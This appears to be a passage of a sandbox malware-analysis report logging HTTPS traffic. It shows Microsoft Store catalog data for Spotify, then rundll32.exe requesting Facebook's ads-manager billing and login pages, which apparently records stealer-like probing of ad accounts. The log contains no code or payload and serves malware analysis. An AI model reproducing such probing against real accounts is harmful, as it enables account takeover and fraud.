                                                                                                                                                                                    2023-01-05 07:59:23 UTC16099INData Raw: 66 61 6c 73 65 2c 5c 22 63 6f 6e 74 65 6e 74 2e 70 61 63 6b 61 67 65 49 64 5c 22 3a 5c 22 53 70 6f 74 69 66 79 41 42 2e 53 70 6f 74 69 66 79 4d 75 73 69 63 5f 31 2e 32 30 30 2e 31 31 36 35 2e 30 5f 78 38 36 5f 5f 7a 70 64 6e 65 6b 64 72 7a 72 65 61 30 5c 22 2c 5c 22 63 6f 6e 74 65 6e 74 2e 70 72 6f 64 75 63 74 49 64 5c 22 3a 5c 22 63 61 61 63 31 62 39 64 2d 36 32 31 62 2d 34 66 39 36 2d 62 31 34 33 2d 65 31 30 65 31 33 39 37 37 34 30 61 5c 22 2c 5c 22 63 6f 6e 74 65 6e 74 2e 74 61 72 67 65 74 50 6c 61 74 66 6f 72 6d 73 5c 22 3a 5b 7b 5c 22 70 6c 61 74 66 6f 72 6d 2e 6d 61 78 56 65 72 73 69 6f 6e 54 65 73 74 65 64 5c 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 5c 22 70 6c 61 74 66 6f 72 6d 2e 6d 69 6e 56 65 72 73 69 6f 6e 5c 22 3a 32 38 31 34
                                                                                                                                                                                    Data Ascii: false,\"content.packageId\":\"SpotifyAB.SpotifyMusic_1.200.1165.0_x86__zpdnekdrzrea0\",\"content.productId\":\"caac1b9d-621b-4f96-b143-e10e1397740a\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814751014977536,\"platform.minVersion\":2814
                                                                                                                                                                                    2023-01-05 07:59:23 UTC16100INData Raw: 75 6c 6c 7d 7d 5d 2c 22 42 75 6e 64 6c 65 64 53 6b 75 73 22 3a 5b 5d 2c 22 49 73 52 65 70 75 72 63 68 61 73 61 62 6c 65 22 3a 66 61 6c 73 65 7d 2c 22 53 6b 75 41 53 63 68 65 6d 61 22 3a 22 53 6b 75 3b 33 22 2c 22 53 6b 75 42 53 63 68 65 6d 61 22 3a 22 53 6b 75 55 6e 69 66 69 65 64 41 70 70 3b 33 22 2c 22 53 6b 75 49 64 22 3a 22 30 30 31 30 22 2c 22 53 6b 75 54 79 70 65 22 3a 22 66 75 6c 6c 22 2c 22 52 65 63 75 72 72 65 6e 63 65 50 6f 6c 69 63 79 22 3a 6e 75 6c 6c 7d 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 69 65 73 22 3a 5b 7b 22 41 63 74 69 6f 6e 73 22 3a 5b 22 44 65 74 61 69 6c 73 22 2c 22 46 75 6c 66 69 6c 6c 22 2c 22 50 75 72 63 68 61 73 65 22 2c 22 42 72 6f 77 73 65 22 2c 22 43 75 72 61 74 65 22 2c 22 52 65 64 65 65 6d 22 5d 2c 22 41 76 61 69 6c 61 62
                                                                                                                                                                                    Data Ascii: ull}}],"BundledSkus":[],"IsRepurchasable":false},"SkuASchema":"Sku;3","SkuBSchema":"SkuUnifiedApp;3","SkuId":"0010","SkuType":"full","RecurrencePolicy":null},"Availabilities":[{"Actions":["Details","Fulfill","Purchase","Browse","Curate","Redeem"],"Availab
                                                                                                                                                                                    2023-01-05 07:59:23 UTC16101INData Raw: 73 65 44 61 74 65 22 3a 22 32 30 31 37 2d 31 30 2d 32 34 54 31 32 3a 30 34 3a 32 35 2e 35 33 35 31 33 38 33 5a 22 7d 2c 22 53 6b 75 49 64 22 3a 22 30 30 31 30 22 2c 22 44 69 73 70 6c 61 79 52 61 6e 6b 22 3a 30 2c 22 52 65 6d 65 64 69 61 74 69 6f 6e 52 65 71 75 69 72 65 64 22 3a 66 61 6c 73 65 7d 2c 7b 22 41 63 74 69 6f 6e 73 22 3a 5b 22 4c 69 63 65 6e 73 65 22 2c 22 42 72 6f 77 73 65 22 2c 22 44 65 74 61 69 6c 73 22 5d 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 41 53 63 68 65 6d 61 22 3a 22 41 76 61 69 6c 61 62 69 6c 69 74 79 3b 33 22 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 42 53 63 68 65 6d 61 22 3a 22 41 76 61 69 6c 61 62 69 6c 69 74 79 55 6e 69 66 69 65 64 41 70 70 3b 33 22 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 49 64 22 3a 22 42 31 30 50 32 4d 36
                                                                                                                                                                                    Data Ascii: seDate":"2017-10-24T12:04:25.5351383Z"},"SkuId":"0010","DisplayRank":0,"RemediationRequired":false},{"Actions":["License","Browse","Details"],"AvailabilityASchema":"Availability;3","AvailabilityBSchema":"AvailabilityUnifiedApp;3","AvailabilityId":"B10P2M6
                                                                                                                                                                                    2023-01-05 07:59:23 UTC16102INData Raw: 3a 5b 22 62 69 67 3a 39 4e 43 42 43 53 5a 53 4a 52 53 42 3a 30 30 30 32 22 5d 2c 22 4c 69 63 65 6e 73 69 6e 67 4b 65 79 49 64 73 22 3a 5b 22 31 22 5d 7d 5d 7d 2c 22 4d 61 72 6b 65 74 73 22 3a 5b 22 55 53 22 5d 2c 22 4f 72 64 65 72 4d 61 6e 61 67 65 6d 65 6e 74 44 61 74 61 22 3a 7b 22 47 72 61 6e 74 65 64 45 6e 74 69 74 6c 65 6d 65 6e 74 4b 65 79 73 22 3a 5b 5d 2c 22 50 72 69 63 65 22 3a 7b 22 43 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 22 49 73 50 49 52 65 71 75 69 72 65 64 22 3a 66 61 6c 73 65 2c 22 4c 69 73 74 50 72 69 63 65 22 3a 30 2e 30 2c 22 4d 53 52 50 22 3a 30 2e 30 2c 22 54 61 78 54 79 70 65 22 3a 22 22 2c 22 57 68 6f 6c 65 73 61 6c 65 43 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 22 7d 7d 2c 22 50 72 6f 70 65 72 74 69 65 73 22 3a
                                                                                                                                                                                    Data Ascii: :["big:9NCBCSZSJRSB:0002"],"LicensingKeyIds":["1"]}]},"Markets":["US"],"OrderManagementData":{"GrantedEntitlementKeys":[],"Price":{"CurrencyCode":"USD","IsPIRequired":false,"ListPrice":0.0,"MSRP":0.0,"TaxType":"","WholesaleCurrencyCode":""}},"Properties":
                                                                                                                                                                                    2023-01-05 07:59:23 UTC16103INData Raw: 31 32 2d 31 33 54 31 35 3a 31 32 3a 32 30 2e 35 31 30 30 32 39 37 5a 22 2c 22 4c 69 63 65 6e 73 69 6e 67 44 61 74 61 22 3a 7b 22 53 61 74 69 73 66 79 69 6e 67 45 6e 74 69 74 6c 65 6d 65 6e 74 4b 65 79 73 22 3a 5b 7b 22 45 6e 74 69 74 6c 65 6d 65 6e 74 4b 65 79 73 22 3a 5b 22 62 69 67 3a 39 4e 43 42 43 53 5a 53 4a 52 53 42 3a 30 30 31 30 22 5d 2c 22 4c 69 63 65 6e 73 69 6e 67 4b 65 79 49 64 73 22 3a 5b 22 31 22 5d 7d 2c 7b 22 45 6e 74 69 74 6c 65 6d 65 6e 74 4b 65 79 73 22 3a 5b 22 77 65 73 3a 41 70 70 3a 63 61 61 63 31 62 39 64 2d 36 32 31 62 2d 34 66 39 36 2d 62 31 34 33 2d 65 31 30 65 31 33 39 37 37 34 30 61 3a 46 75 6c 6c 22 5d 2c 22 4c 69 63 65 6e 73 69 6e 67 4b 65 79 49 64 73 22 3a 5b 22 31 22 5d 7d 2c 7b 22 45 6e 74 69 74 6c 65 6d 65 6e 74 4b 65 79
                                                                                                                                                                                    Data Ascii: 12-13T15:12:20.5100297Z","LicensingData":{"SatisfyingEntitlementKeys":[{"EntitlementKeys":["big:9NCBCSZSJRSB:0010"],"LicensingKeyIds":["1"]},{"EntitlementKeys":["wes:App:caac1b9d-621b-4f96-b143-e10e1397740a:Full"],"LicensingKeyIds":["1"]},{"EntitlementKey
                                                                                                                                                                                    2023-01-05 07:59:23 UTC16104INData Raw: 72 61 74 65 64 20 70 6c 61 79 6c 69 73 74 73 20 69 6e 20 65 76 65 72 79 20 67 65 6e 72 65 20 61 6e 64 20 6d 6f 6f 64 2e 20 52 61 64 69 6f 20 70 6c 61 79 73 20 79 6f 75 20 67 72 65 61 74 20 73 6f 6e 67 20 61 66 74 65 72 20 67 72 65 61 74 20 73 6f 6e 67 2c 20 62 61 73 65 64 20 6f 6e 20 79 6f 75 72 20 6d 75 73 69 63 20 74 61 73 74 65 2e 20 44 69 73 63 6f 76 65 72 20 6e 65 77 20 6d 75 73 69 63 20 74 6f 6f 2c 20 77 69 74 68 20 61 77 65 73 6f 6d 65 20 70 6c 61 79 6c 69 73 74 73 20 62 75 69 6c 74 20 6a 75 73 74 20 66 6f 72 20 79 6f 75 2e 5c 72 5c 6e c2 a0 5c 72 5c 6e 53 70 6f 74 69 66 79 20 61 6c 73 6f 20 6f 66 66 65 72 73 20 34 20 6d 69 6c 6c 69 6f 6e 20 50 6f 64 63 61 73 74 73 2c 20 69 6e 63 6c 75 64 69 6e 67 20 6f 72 69 67 69 6e 61 6c 73 20 61 6e 64 20 65 78
                                                                                                                                                                                    Data Ascii: rated playlists in every genre and mood. Radio plays you great song after great song, based on your music taste. Discover new music too, with awesome playlists built just for you.\r\n\r\nSpotify also offers 4 million Podcasts, including originals and ex
                                                                                                                                                                                    2023-01-05 07:59:23 UTC16105INData Raw: 75 73 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 73 70 6f 74 69 66 79 5c 72 5c 6e 46 6f 6c 6c 6f 77 20 75 73 20 6f 6e 20 54 77 69 74 74 65 72 3a 20 68 74 74 70 3a 2f 2f 74 77 69 74 74 65 72 2e 63 6f 6d 2f 73 70 6f 74 69 66 79 22 2c 22 53 6b 75 54 69 74 6c 65 22 3a 22 53 70 6f 74 69 66 79 20 2d 20 4d 75 73 69 63 20 61 6e 64 20 50 6f 64 63 61 73 74 73 22 2c 22 4c 61 6e 67 75 61 67 65 22 3a 22 65 6e 2d 75 73 22 2c 22 4d 61 72 6b 65 74 73 22 3a 5b 22 55 53 22 2c 22 44 5a 22 2c 22 41 52 22 2c 22 41 55 22 2c 22 41 54 22 2c 22 42 48 22 2c 22 42 44 22 2c 22 42 45 22 2c 22 42 52 22 2c 22 42 47 22 2c 22 43 41 22 2c 22 43 4c 22 2c 22 43 4e 22 2c 22 43 4f 22 2c 22 43 52 22 2c 22 48 52 22 2c 22 43
                                                                                                                                                                                    Data Ascii: us on Facebook: http://www.facebook.com/spotify\r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify - Music and Podcasts","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","C
                                                                                                                                                                                    2023-01-05 07:59:23 UTC16106INData Raw: 4d 57 22 2c 22 49 4d 22 2c 22 4d 48 22 2c 22 4d 51 22 2c 22 4d 55 22 2c 22 59 54 22 2c 22 46 4d 22 2c 22 4d 44 22 2c 22 4d 4e 22 2c 22 4d 53 22 2c 22 4d 5a 22 2c 22 4d 4d 22 2c 22 4e 41 22 2c 22 4e 52 22 2c 22 4e 50 22 2c 22 4d 56 22 2c 22 4d 4c 22 2c 22 4e 43 22 2c 22 4e 49 22 2c 22 4e 45 22 2c 22 4e 55 22 2c 22 4e 46 22 2c 22 50 57 22 2c 22 50 53 22 2c 22 50 41 22 2c 22 50 47 22 2c 22 50 59 22 2c 22 52 45 22 2c 22 52 57 22 2c 22 42 4c 22 2c 22 4d 46 22 2c 22 57 53 22 2c 22 53 54 22 2c 22 53 4e 22 2c 22 4d 50 22 2c 22 50 4e 22 2c 22 53 58 22 2c 22 53 42 22 2c 22 53 4f 22 2c 22 53 43 22 2c 22 53 4c 22 2c 22 47 53 22 2c 22 53 48 22 2c 22 4b 4e 22 2c 22 4c 43 22 2c 22 50 4d 22 2c 22 56 43 22 2c 22 54 4a 22 2c 22 54 5a 22 2c 22 54 47 22 2c 22 54 4b 22 2c 22
                                                                                                                                                                                    Data Ascii: MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","
                                                                                                                                                                                    2023-01-05 07:59:23 UTC16107INData Raw: 4e 61 6d 65 46 6f 72 44 6c 63 22 3a 6e 75 6c 6c 2c 22 50 61 63 6b 61 67 65 46 75 6c 6c 4e 61 6d 65 22 3a 22 53 70 6f 74 69 66 79 41 42 2e 53 70 6f 74 69 66 79 4d 75 73 69 63 5f 31 2e 31 39 32 2e 36 34 37 2e 30 5f 78 38 36 5f 5f 7a 70 64 6e 65 6b 64 72 7a 72 65 61 30 22 2c 22 50 61 63 6b 61 67 65 49 64 22 3a 22 65 33 66 66 62 61 66 31 2d 35 33 33 64 2d 30 65 36 32 2d 35 33 34 61 2d 37 30 30 33 62 33 35 63 30 37 35 39 2d 58 38 36 22 2c 22 50 61 63 6b 61 67 65 52 61 6e 6b 22 3a 33 30 30 30 31 2c 22 50 6c 61 74 66 6f 72 6d 44 65 70 65 6e 64 65 6e 63 69 65 73 22 3a 5b 7b 22 4d 61 78 54 65 73 74 65 64 22 3a 32 38 31 34 37 35 30 37 35 34 32 37 35 33 32 38 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 32 38 31 34 37 35 30 37 31 30 33 36 36 35 35 39 2c 22 50 6c 61 74
                                                                                                                                                                                    Data Ascii: NameForDlc":null,"PackageFullName":"SpotifyAB.SpotifyMusic_1.192.647.0_x86__zpdnekdrzrea0","PackageId":"e3ffbaf1-533d-0e62-534a-7003b35c0759-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750754275328,"MinVersion":2814750710366559,"Plat
                                                                                                                                                                                    2023-01-05 07:59:23 UTC16108INData Raw: 79 73 74 65 6d 49 64 5c 22 3a 31 36 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 37 32 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 35 7d 2c 7b 5c 22 6c 65 76 65 6c 5c 22 3a 36 37 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 31 33 7d 5d 7d 7d 22 2c 22 50 61 63 6b 61 67 65 44 6f 77 6e 6c 6f 61 64 55 72 69 73 22 3a 6e 75 6c 6c 2c 22 46 75 6c 66 69 6c 6c 6d 65 6e 74 44 61 74 61 22 3a 7b 22 50 72 6f 64 75 63 74 49 64 22 3a 22 39 4e 43 42 43 53 5a 53 4a 52 53 42 22 2c 22 57 75 42 75 6e 64 6c 65 49 64 22 3a 22 30 65 39 30 37 66 31 64 2d 37 63 30 62 2d 34 62 63 33 2d 39 63 38 37 2d 35 62 61 31 32 35 32 66 64 31 62 38 22 2c 22 57 75 43 61 74 65 67 6f 72 79 49 64 22 3a 22 35 63 33 35 33 62 39 63 2d 37 61 63 37 2d 34 64 32 37 2d 61 66 30 37 2d 39 32 33 65 37 64 39 61 61 32
                                                                                                                                                                                    Data Ascii: ystemId\":16},{\"level\":72,\"systemId\":15},{\"level\":67,\"systemId\":13}]}}","PackageDownloadUris":null,"FulfillmentData":{"ProductId":"9NCBCSZSJRSB","WuBundleId":"0e907f1d-7c0b-4bc3-9c87-5ba1252fd1b8","WuCategoryId":"5c353b9c-7ac7-4d27-af07-923e7d9aa2
                                                                                                                                                                                    2023-01-05 07:59:23 UTC16109INData Raw: 32 35 32 38 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 44 65 73 6b 74 6f 70 22 7d 5d 2c 22 50 6c 61 74 66 6f 72 6d 44 65 70 65 6e 64 65 6e 63 79 58 6d 6c 42 6c 6f 62 22 3a 22 7b 5c 22 62 6c 6f 62 2e 76 65 72 73 69 6f 6e 5c 22 3a 31 36 38 38 38 36 37 30 34 30 35 32 36 33 33 36 2c 5c 22 63 6f 6e 74 65 6e 74 2e 69 73 4d 61 69 6e 5c 22 3a 66 61 6c 73 65 2c 5c 22 63 6f 6e 74 65 6e 74 2e 70 61 63 6b 61 67 65 49 64 5c 22 3a 5c 22 53 70 6f 74 69 66 79 41 42 2e 53 70 6f 74 69 66 79 4d 75 73 69 63 5f 31 2e 32 30 30 2e 31 31 36 35 2e 30 5f 78 38 36 5f 5f 7a 70 64 6e 65 6b 64 72 7a 72 65 61 30 5c 22 2c 5c 22 63 6f 6e 74 65 6e 74 2e 70 72 6f 64 75 63 74 49 64 5c 22 3a 5c 22 63 61 61 63 31 62 39 64 2d 36 32 31 62 2d 34 66 39 36 2d 62 31
                                                                                                                                                                                    Data Ascii: 2528,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"SpotifyAB.SpotifyMusic_1.200.1165.0_x86__zpdnekdrzrea0\",\"content.productId\":\"caac1b9d-621b-4f96-b1
                                                                                                                                                                                    2023-01-05 07:59:23 UTC16110INData Raw: 2d 39 32 33 65 37 64 39 61 61 32 65 32 22 2c 22 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 22 3a 22 53 70 6f 74 69 66 79 41 42 2e 53 70 6f 74 69 66 79 4d 75 73 69 63 5f 7a 70 64 6e 65 6b 64 72 7a 72 65 61 30 22 2c 22 53 6b 75 49 64 22 3a 22 30 30 31 31 22 2c 22 43 6f 6e 74 65 6e 74 22 3a 6e 75 6c 6c 2c 22 50 61 63 6b 61 67 65 46 65 61 74 75 72 65 73 22 3a 6e 75 6c 6c 7d 7d 5d 2c 22 42 75 6e 64 6c 65 64 53 6b 75 73 22 3a 5b 5d 2c 22 49 73 52 65 70 75 72 63 68 61 73 61 62 6c 65 22 3a 66 61 6c 73 65 7d 2c 22 53 6b 75 41 53 63 68 65 6d 61 22 3a 22 53 6b 75 3b 33 22 2c 22 53 6b 75 42 53 63 68 65 6d 61 22 3a 22 53 6b 75 55 6e 69 66 69 65 64 41 70 70 3b 33 22 2c 22 53 6b 75 49 64 22 3a 22 30 30 31 31 22 2c 22 53 6b 75 54 79 70 65 22 3a 22 74 72 69 61 6c
                                                                                                                                                                                    Data Ascii: -923e7d9aa2e2","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","SkuId":"0011","Content":null,"PackageFeatures":null}}],"BundledSkus":[],"IsRepurchasable":false},"SkuASchema":"Sku;3","SkuBSchema":"SkuUnifiedApp;3","SkuId":"0011","SkuType":"trial
                                                                                                                                                                                    2023-01-05 07:59:23 UTC16111INData Raw: 22 3a 7b 7d 2c 22 53 6b 75 49 64 22 3a 22 30 30 31 31 22 2c 22 44 69 73 70 6c 61 79 52 61 6e 6b 22 3a 30 2c 22 52 65 6d 65 64 69 61 74 69 6f 6e 52 65 71 75 69 72 65 64 22 3a 66 61 6c 73 65 7d 2c 7b 22 41 63 74 69 6f 6e 73 22 3a 5b 22 4c 69 63 65 6e 73 65 22 2c 22 44 65 74 61 69 6c 73 22 5d 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 41 53 63 68 65 6d 61 22 3a 22 41 76 61 69 6c 61 62 69 6c 69 74 79 3b 33 22 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 42 53 63 68 65 6d 61 22 3a 22 41 76 61 69 6c 61 62 69 6c 69 74 79 55 6e 69 66 69 65 64 41 70 70 3b 33 22 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 49 64 22 3a 22 42 34 35 48 4c 51 35 4c 44 38 48 57 22 2c 22 43 6f 6e 64 69 74 69 6f 6e 73 22 3a 7b 22 43 6c 69 65 6e 74 43 6f 6e 64 69 74 69 6f 6e 73 22 3a 7b 22 41 6c
                                                                                                                                                                                    Data Ascii: ":{},"SkuId":"0011","DisplayRank":0,"RemediationRequired":false},{"Actions":["License","Details"],"AvailabilityASchema":"Availability;3","AvailabilityBSchema":"AvailabilityUnifiedApp;3","AvailabilityId":"B45HLQ5LD8HW","Conditions":{"ClientConditions":{"Al
                                                                                                                                                                                    2023-01-05 07:59:23 UTC16112INData Raw: 61 6e 6b 22 3a 31 2c 22 52 65 6d 65 64 69 61 74 69 6f 6e 52 65 71 75 69 72 65 64 22 3a 66 61 6c 73 65 7d 5d 7d 5d 7d 5d 2c 22 54 6f 74 61 6c 52 65 73 75 6c 74 43 6f 75 6e 74 22 3a 31 7d
                                                                                                                                                                                    Data Ascii: ank":1,"RemediationRequired":false}]}]}],"TotalResultCount":1}


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    63192.168.2.449959157.240.247.35443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:59:24 UTC16112OUTGET /ads/manager/account_settings/account_billing HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                    Host: www.facebook.com
                                                                                                                                                                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42
                                                                                                                                                                                    sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    sec-ch-prefers-color-scheme: light
                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                    2023-01-05 07:59:24 UTC16113INHTTP/1.1 302 Found
                                                                                                                                                                                    Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                                                                                                                                                                    x-fb-rlafr: 0
                                                                                                                                                                                    content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                                                                                    2023-01-05 07:59:24 UTC16114INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                                                                    Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    64192.168.2.449963157.240.247.35443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16116OUTGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                    Host: www.facebook.com
                                                                                                                                                                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42
                                                                                                                                                                                    sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    sec-ch-prefers-color-scheme: light
                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                    2023-01-05 07:59:25 UTC16117INHTTP/1.1 200 OK
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                                                                                                                    x-fb-rlafr: 0
                                                                                                                                                                                    content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
